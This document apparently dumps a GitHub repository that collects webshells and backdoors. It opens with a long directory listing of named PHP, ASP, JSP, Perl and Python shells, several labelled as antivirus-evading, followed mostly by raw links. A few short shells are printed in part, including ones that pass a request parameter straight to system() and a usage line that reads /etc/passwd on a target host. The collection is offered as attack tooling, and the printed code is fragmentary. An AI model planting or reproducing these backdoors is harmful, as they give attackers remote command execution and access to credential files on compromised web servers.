JspWebshell 1.2.jsp │ ├── browser.jsp │ ├── cmd.jsp │ ├── cmd_win32.jsp │ ├── jspShell.jsp │ ├── jspbd.jsp │ ├── list.jsp │ ├── up.jsp │ └── up_win32.jsp ├── Other │ ├── cmd.c │ └── cmd.cfm ├── PHP.7z ├── PHP │ ├── 150.php │ ├── 27.9.txt │ ├── 2mv2.txt │ ├── 404.php │ ├── 404.txt │ ├── Ajax_PHP Command Shell.txt │ ├── Ajax_PHP Command Shell.txt.1 │ ├── Ani-Shell.php │ ├── AntiSecShell.v0.5.txt │ ├── Antichat Shell v1.3.php │ ├── Antichat Shell v1.3.txt │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt │ ├── Backdoor.PHP.Agent.php │ ├── Crystal.txt │ ├── CrystalShell v.1.txt │ ├── Cyber Shell (v 1.0).php │ ├── DTool Pro.txt │ ├── Dive Shell 1.0 - Emperor Hacking Team.php │ ├── Dive Shell 1.0 - Emperor Hacking Team.txt │ ├── Dx.txt │ ├── DxShell.1.0.txt │ ├── FaTaLisTiCz_Fx.txt │ ├── Fx29Sh.3.2.12.08.txt │ ├── G5.php │ ├── GFS web-shell ver 3.1.7 - PRiV8.txt │ ├── GNY.Shell.v1.1.txt │ ├── KAdot Universal Shell v0.1.6.php │ ├── KAdot Universal Shell v0.1.6.txt │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt │ ├── Macker's Private PHPShell.php │ ├── Moroccan Spamers Ma-EditioN By GhOsT.txt │ ├── MySQL Web Interface Version 0.8.php │ ├── MySQL Web Interface Version 0.8.txt │ ├── Mysql interface v1.0.txt │ ├── NCC-Shell.txt │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt │ ├── NetworkFileManagerPHP.txt │ ├── PH Vayv.txt │ ├── PHANTASMA.txt │ ├── PHP Shell.txt │ ├── PHPJackal.txt │ ├── PHPRemoteView.txt │ ├── PHPSPY.php │ ├── Php_Backdoor.txt │ ├── Private-i3lue.php │ ├── Private-i3lue.txt │ ├── RedhatC99 [login=redhat-pass=root] │ ├── Rootshell.v.1.0.txt │ ├── Safe mode breaker.php │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt │ ├── Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.txt │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt │ ├── SimShell 1.0 - Simorgh Security MGZ.php │ ├── SimShell 1.0 - Simorgh Security MGZ.txt │ ├── SnIpEr_SA Shell.txt │ ├── Sst-Sheller.php │ ├── SyRiAn.Sh3ll.v7.txt │ ├── WinX Shell.php │ ├── WinX Shell.txt │ ├── Worse Linux Shell.php │ ├── Worse Linux Shell.txt │ ├── a.php │ ├── aZRaiLPhp v1.0.php │ ├── aZRaiLPhp v1.0.txt │ ├── accept_language.txt │ ├── acid.php │ ├── antichat.php │ ├── arabicspy.php │ ├── b37.php │ ├── b374k.v1.txt │ ├── backupsql.txt │ ├── bdotw44shell.txt │ ├── bug (1).php │ ├── bug.php │ ├── bypass.txt │ ├── c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php │ ├── c100.txt │ ├── c37.php │ ├── c66.php │ ├── c99-bd.txt │ ├── c99-shadows-mod.php │ ├── c99.php │ ├── c99.txt │ ├── c993.txt │ ├── c99_2.txt │ ├── c99_PSych0.php │ ├── c99_locus7s.txt │ ├── c99_madnet.txt │ ├── c99_w4cking.txt │ ├── c99madshell.php │ ├── c99shell.php │ ├── c99ud.txt │ ├── c99unlimited.txt │ ├── c99v2.php │ ├── cbfphpsh.txt │ ├── cihshell_fix.php │ ├── cmd.php │ ├── cmd.txt │ ├── co.php │ ├── connect-back.php.txt │ ├── cpanel.txt │ ├── cpg_143_incl_xpl.php │ ├── ctt_sh.txt │ ├── cybershell.txt │ ├── dC3 Security Crew Shell PRiV.txt │ ├── dC3.Security.Crew.Shell.priv8.txt │ ├── egy.txt │ ├── erne.txt │ ├── ex0shell.txt │ ├── fx.txt │ ├── g00nshell-v1.3.txt │ ├── g00nv13.php │ ├── gfs_sh.txt │ ├── h4ntu shell [powered by tsoi].php │ ├── h4ntu shell [powered by tsoi].txt │ ├── hkrkoz.php │ ├── iMHaPFtp.txt │ ├── ironshell.txt │ ├── isko.txt │ ├── iskorpitx.txt │ ├── itsecteam.v2.1.txt │ ├── itsecteam_shell.php │ ├── jHn.php │ ├── knullsh.txt │ ├── kolang-bypass.txt │ ├── kral.txt │ ├── lamashell.txt │ ├── list.php │ ├── load_shell.txt │ ├── locus.txt │ ├── log.txt │ ├── lolipop.txt │ ├── lostDC.txt │ ├── ly0kha.txt │ ├── matamu.txt │ ├── megabor.txt │ ├── metaslsoft.php │ ├── mini.j0s_ali.j0e.v27.9.txt │ ├── myshell.txt │ ├── mysql.txt │ ├── mysql_tool.txt │ ├── mysqlwebsh.php │ ├── newsh.php │ ├── nshell.txt │ ├── nst.txt │ ├── nstview.txt │ ├── p0isoN.sh3ll.txt │ ├── pHpINJ.txt │ ├── php-backdoor.txt │ ├── php-include-w-shell.txt │ ├── phpjackal1.3.txt │ ├── phpshell.php │ ├── priv8-2012-bypass-shell.txt │ ├── pws.txt │ ├── r57-bd.txt │ ├── r57.1.4.0.php │ ├── r57.mod-bizzz.shell.txt │ ├── r57.php │ ├── r57.txt │ ├── r57142.php │ ├── r57_Mohajer22.txt │ ├── r57_iFX.txt │ ├── r57_kartal.txt │ ├── r57shell1.40.txt │ ├── r57shell2.0.txt │ ├── redcod.php │ ├── remview_fix.php │ ├── rootshell.txt │ ├── ru24_post_sh.txt │ ├── s72 Shell v1.1 Coding.php │ ├── s72 Shell v1.1 Coding.txt │ ├── safe0ver.txt │ ├── shellzx.txt │ ├── simattacker.txt │ ├── simple-backdoor.txt │ ├── simple_cmd.txt │ ├── small.txt │ ├── sniper.txt │ ├── soldierofallah.txt │ ├── sosyete.txt │ ├── spygrup.txt │ ├── sql.php │ ├── stres.txt │ ├── ugdevil.v2.0.txt │ ├── up.php │ ├── uploader.txt │ ├── wso.v2.5.txt │ ├── wso2.5.php │ ├── wso2.php │ ├── x0rg.byp4ss.txt │ └── zacosmall.txt ├── PL │ ├── Perl Web Shell by RST-GHC.pl │ ├── cgitelnet.txt │ ├── cmd.pl │ ├── dc.pl │ ├── list.pl │ └── up.pl └── README.md ├── www-7jyewu-cn ├── DOC_ZIBSZXBIEG.php ├── README.md ├── UnKnown 高级Vip防删收费版 (1).asp ├── UnKnown 高级Vip防删收费版.asp ├── aspx经典大马.aspx ├── asp小马.asp ├── 【批量下载】银河舰队大马_2014版等.zip ├── 不灭之魂2013改进版本.asp ├── 不灭之魂2014改进版本.asp ├── 传说中的草泥马4.0 (1).asp ├── 传说中的草泥马4.0.asp ├── 免杀php大马.php ├── 国外免杀PHP大马_未翻译.php ├── 国外免杀php大马.php ├── 土司搞基asp大马 (1).asp ├── 土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp ├── 土司搞基asp大马.asp ├── 拿站小助手-经典Asp小马.asp ├── 星外虚拟机提权专用asp大马 (1).asp ├── 星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp ├── 星外虚拟机提权专用asp大马.asp ├── 最新过安全狗- 免杀PHP大马 -.php ├── 法克僵尸大马 (1).asp ├── 法克僵尸大马.asp ├── 火狐NEW WebShell (1).asp ├── 火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp ├── 火狐NEW WebShell.asp ├── 牛逼免杀提权隐藏大马 (1).asp ├── 牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp ├── 牛逼免杀提权隐藏大马.asp ├── 银河舰队大马_2012版.asp ├── 银河舰队大马_2014版.asp └── 非常牛逼的Jsp大马.jsp └── xakep-shells ├── ASP ├── Ajan.asp.txt ├── CMD.asp.txt ├── CmdAsp.asp.txt ├── CyberSpy5.Asp.txt ├── EFSO_2.asp.txt ├── Elmali Seker.asp.txt ├── NT Addy.asp.txt ├── Rader.asp.txt ├── Reader.asp.txt ├── RemExp.asp.txt ├── Server Variables.asp.txt ├── Tool.asp.txt ├── Zehir 4.asp.txt ├── aspydrv.asp.txt ├── cmd-asp-5.1.asp.txt ├── elmaliseker.asp.txt ├── indexer.asp.txt ├── kacak.asp.txt ├── klasvayv.asp.txt ├── ntdaddy.asp.txt └── zehir4.asp.txt ├── CGI ├── WebShell.cgi.txt ├── go-shell.cgi.txt ├── lurm_safemod_on.cgi.txt └── telnet.cgi.txt ├── JSP ├── Java Shell.js.txt ├── JspWebshell 1.2.jsp.txt ├── cmdjsp.jsp.txt ├── jsp-reverse.jsp.txt └── jspshall.jsp.txt ├── PERL ├── Asmodeus v0.1.pl.txt ├── connectback2.pl.txt ├── perlbot.pl.txt ├── shellbot.pl.txt ├── telnet.pl.txt └── telnetd.pl.txt ├── PHP ├── 1.txt ├── 2008.php.php.txt ├── Ajax_PHP Command Shell.php.txt ├── Antichat Shell v1.3.php.txt ├── Antichat Socks5 Server.php.php.txt ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt ├── Casus15.php.php.txt ├── Crystal.php.txt ├── DTool Pro.php.txt ├── Dive Shell 1.0 - Emperor Hacking Team.php.txt ├── Dx.php.php.txt ├── DxShell.php.php.txt ├── Fatalshell.php.php.txt ├── GFS web-shell ver 3.1.7 - PRiV8.php.txt ├── KA_uShell.php.php.txt ├── KAdot Universal Shell v0.1.6.html.txt ├── LOTFREE.php.php.txt ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt ├── Moroccan Spamers Ma-EditioN By GhOsT.php.txt ├── MySQL Web Interface Version 0.8.php.txt ├── Mysql interface v1.0.php.txt ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt ├── NetworkFileManagerPHP.php.txt ├── Nshell (1).php.php.txt ├── PH Vayv.php.php.txt ├── PHANTASMA.php.txt ├── PHP Backdoor Connect.pl.php.txt ├── PHP Shell.php.php.txt ├── PHPRemoteView.php.txt ├── Private-i3lue.php.txt ├── Rem View.php.php.txt ├── Russian.php.php.txt ├── STNC.php.php.txt ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt ├── SimShell 1.0 - Simorgh Security MGZ.php.txt ├── Sincap.php.php.txt ├── SnIpEr_SA Shell.php.txt ├── SpecialShell_99.php.php.txt ├── SsEs.php.php.txt ├── Test.php.php.txt ├── WinX Shell.html.txt ├── Worse Linux Shell.php.txt ├── aZRaiLPhp v1.0.php.txt ├── a_gedit.php.php.txt ├── accept_language.php.txt ├── ak74shell.php.php.txt ├── antichat.php.php.txt ├── backdoor1.php.txt ├── backdoorfr.php.txt ├── backup.php.php.txt ├── backupsql.php.php.txt ├── c100.php.txt ├── c2007.php.php.txt ├── c99madshell_v2.0.php.php.txt ├── c99madshell_v2.1.php.php.txt ├── c99php.txt ├── c99shell_v1.0.php.php.txt ├── crystal.txt ├── csh.php.php.txt ├── ctt_sh.php.php.txt ├── cyberlords_sql.php.php.txt ├── cybershell.php.php.txt ├── dC3 Security Crew Shell PRiV.php.txt ├── framer.zip ├── fuckphpshell.php.txt ├── gfs_sh.php.php.txt ├── h4ntu shell [powered by tsoi].txt ├── hidshell.php.php.txt ├── iMHaPFtp.php.php.txt ├── img.php.php.txt ├── ironshell.php.txt ├── lamashell.php.txt ├── load_shell.php.php.txt ├── mailer3.php.php.txt ├── matamu.php.txt ├── myshell.php.php.txt ├── mysql.php.php.txt ├── mysql_shell.php.txt ├── mysql_tool.php.php.txt ├── network.php.php.txt ├── nfm.php.php.txt ├── ngh.php.php.txt ├── nixrem.php.php.txt ├── nshell.php.php.txt ├── nst.php.php.txt ├── nstview.php.php.txt ├── pHpINJ.php.php.txt ├── php-backdoor.php.txt ├── php-include-w-shell.php.txt ├── phpbackdoor15.php.txt ├── phpjackal.php.txt ├── phpshell17.php.txt ├── phvayv.php.php.txt ├── phvayvv.php.php.txt ├── predator.php.php.txt ├── pws.php.php.txt ├── r57 Shell.php.php.txt ├── r57.php.php.txt ├── r577.php.php.txt ├── r57shell.php.php.txt ├── rootshell.php.txt ├── rst_sql.php.php.txt ├── ru24_post_sh.php.php.txt ├── s.php.php.txt ├── s72 Shell v1.1 Coding.html.txt ├── s72_shell.txt ├── sh.php.php.txt ├── shankar.php.php.txt ├── shell.php.php.txt ├── simple-backdoor.php.txt ├── simple_cmd.html.txt ├── small.php.php.txt ├── sniper_sa_shell.txt ├── spy.php.php.txt ├── sql.php.php.txt ├── uploader.php.php.txt ├── w.php.php.txt ├── w3d.php.php.txt ├── w4k.php.php.txt ├── wacking.php.php.txt ├── webadmin.php.php.txt ├── webshell.php.txt ├── wso.txt ├── xinfo.php.php.txt └── zacosmall.php.txt ├── PY ├── Phyton Shell.py.txt ├── cgi-python.py.txt ├── smtpd.py.txt └── wh_bindshell.py.txt ├── README.md └── others ├── mod_joomla_shell.PNG ├── mod_joomla_shell.zip └── tools └── DefaceKeeper_0.2.php.txt /138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt -------------------------------------------------------------------------------- /138shell/A/aZRaiLPhp v1.0.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/A/aZRaiLPhp v1.0.txt -------------------------------------------------------------------------------- /138shell/A/accept_language.txt: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /138shell/B/backdoor1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/B/backdoor1.txt -------------------------------------------------------------------------------- /138shell/B/backdoorfr.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/B/backdoorfr.txt -------------------------------------------------------------------------------- /138shell/C/Casus15.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/Casus15.php.txt -------------------------------------------------------------------------------- /138shell/C/Crystal.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/Crystal.txt -------------------------------------------------------------------------------- /138shell/C/CyberSpy5.Asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/CyberSpy5.Asp.txt -------------------------------------------------------------------------------- /138shell/C/c2007.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/c2007.php.txt -------------------------------------------------------------------------------- /138shell/C/c99(1).php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/c99(1).php.txt -------------------------------------------------------------------------------- /138shell/C/c99.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/c99.txt -------------------------------------------------------------------------------- /138shell/C/ctt_sh.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/ctt_sh.php.txt -------------------------------------------------------------------------------- /138shell/C/ctt_sh.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/ctt_sh.txt -------------------------------------------------------------------------------- /138shell/C/cybershell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/cybershell.php.txt -------------------------------------------------------------------------------- /138shell/C/cybershell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/C/cybershell.txt -------------------------------------------------------------------------------- /138shell/D/Dx.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/D/Dx.php.txt -------------------------------------------------------------------------------- /138shell/D/Dx.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/D/Dx.txt -------------------------------------------------------------------------------- /138shell/D/DxShell_hk.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/D/DxShell_hk.php.txt -------------------------------------------------------------------------------- /138shell/E/EFSO_2.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/E/EFSO_2.asp.txt -------------------------------------------------------------------------------- /138shell/F/Fatalshell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/F/Fatalshell.php.txt -------------------------------------------------------------------------------- /138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt -------------------------------------------------------------------------------- /138shell/G/gfs_sh.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/G/gfs_sh.php.txt -------------------------------------------------------------------------------- /138shell/G/gfs_sh.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/G/gfs_sh.txt -------------------------------------------------------------------------------- /138shell/I/Inderxer.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/I/Inderxer.asp.txt -------------------------------------------------------------------------------- /138shell/I/iMHaPFtp.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/I/iMHaPFtp.php.txt -------------------------------------------------------------------------------- /138shell/I/iMHaPFtp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/I/iMHaPFtp.txt -------------------------------------------------------------------------------- /138shell/I/img.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/I/img.php.txt -------------------------------------------------------------------------------- /138shell/I/indexer.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/I/indexer.asp.txt -------------------------------------------------------------------------------- /138shell/J/JspWebshell 1.2.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/J/JspWebshell 1.2.txt -------------------------------------------------------------------------------- /138shell/K/KAdot Universal Shell v0.1.6.html.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/K/KAdot Universal Shell v0.1.6.html.txt -------------------------------------------------------------------------------- /138shell/K/Klasvayv.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/K/Klasvayv.asp.txt -------------------------------------------------------------------------------- /138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt -------------------------------------------------------------------------------- /138shell/L/load_shell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/L/load_shell.php.txt -------------------------------------------------------------------------------- /138shell/L/load_shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/L/load_shell.txt -------------------------------------------------------------------------------- /138shell/M/myshell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/M/myshell.php.txt -------------------------------------------------------------------------------- /138shell/M/mysql.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/M/mysql.php.txt -------------------------------------------------------------------------------- /138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt -------------------------------------------------------------------------------- /138shell/N/NT Addy.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/N/NT Addy.asp.txt -------------------------------------------------------------------------------- /138shell/N/NetworkFileManagerPHP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/N/NetworkFileManagerPHP.txt -------------------------------------------------------------------------------- /138shell/N/network.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/N/network.php.txt -------------------------------------------------------------------------------- /138shell/N/nshell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/N/nshell.php.txt -------------------------------------------------------------------------------- /138shell/N/nstview.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/N/nstview.php.txt -------------------------------------------------------------------------------- /138shell/N/ntdaddy.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/N/ntdaddy.asp.txt -------------------------------------------------------------------------------- /138shell/P/PH Vayv.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/P/PH Vayv.php.txt -------------------------------------------------------------------------------- /138shell/P/PHANTASMA.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/P/PHANTASMA.txt -------------------------------------------------------------------------------- /138shell/P/PHPRemoteView.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/P/PHPRemoteView.txt -------------------------------------------------------------------------------- /138shell/P/Private-i3lue.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/P/Private-i3lue.txt -------------------------------------------------------------------------------- /138shell/P/phpshell17.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/P/phpshell17.txt -------------------------------------------------------------------------------- /138shell/P/phvayv.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/P/phvayv.php.txt -------------------------------------------------------------------------------- /138shell/P/ru24_post_sh.txt: -------------------------------------------------------------------------------- 1 | 11 | 12 | Ru24PostWebShell - ".$_POST['cmd']." 13 | 14 | "; 15 | echo "
"; 16 | echo ""; 17 | echo "
"; 18 | echo "
";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
"; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /138shell/R/Rader.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/R/Rader.asp.txt -------------------------------------------------------------------------------- /138shell/R/Rem Exp.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/R/Rem Exp.asp.txt -------------------------------------------------------------------------------- /138shell/R/Rem View.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/R/Rem View.php.txt -------------------------------------------------------------------------------- /138shell/R/Russian.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/R/Russian.php.txt -------------------------------------------------------------------------------- /138shell/R/r57 Shell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/R/r57 Shell.php.txt -------------------------------------------------------------------------------- /138shell/R/rootshell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/R/rootshell.txt -------------------------------------------------------------------------------- /138shell/R/ru24_post_sh.php.txt: -------------------------------------------------------------------------------- 1 | 11 | 12 | Ru24PostWebShell - ".$_POST['cmd']." 13 | 14 | "; 15 | echo "
"; 16 | echo ""; 17 | echo "
"; 18 | echo "
";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
"; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /138shell/README.md: -------------------------------------------------------------------------------- 1 | 这个是天阳网络技术论坛收集的 2 | 3 | 虽然天阳已经关闭 4 | 5 | 不过天阳的东西还都是很不错的。。 6 | 7 | 留个纪念吧、、 8 | 9 | by tian6 -------------------------------------------------------------------------------- /138shell/S/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/S/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt -------------------------------------------------------------------------------- /138shell/S/Sincap.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/S/Sincap.php.txt -------------------------------------------------------------------------------- /138shell/S/SnIpEr_SA Shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/S/SnIpEr_SA Shell.txt -------------------------------------------------------------------------------- /138shell/S/s72 Shell v1.1 Coding.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/S/s72 Shell v1.1 Coding.txt -------------------------------------------------------------------------------- /138shell/S/shellbot.pl.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/S/shellbot.pl.txt -------------------------------------------------------------------------------- /138shell/S/simple-backdoor.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo ""; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /138shell/S/simple_cmd.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
8 |
9 | 11 |
12 |
13 | 
14 | 
15 | 
16 |
17 | 18 | 7 | 8 | 14 | -------------------------------------------------------------------------------- /138shell/T/Tool.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/T/Tool.asp.txt -------------------------------------------------------------------------------- /138shell/T/telnet.cgi.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/T/telnet.cgi.txt -------------------------------------------------------------------------------- /138shell/T/telnet.pl.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/T/telnet.pl.txt -------------------------------------------------------------------------------- /138shell/U/Uploader.php.txt: -------------------------------------------------------------------------------- 1 |
2 | 3 | Send this file: 4 | 5 |
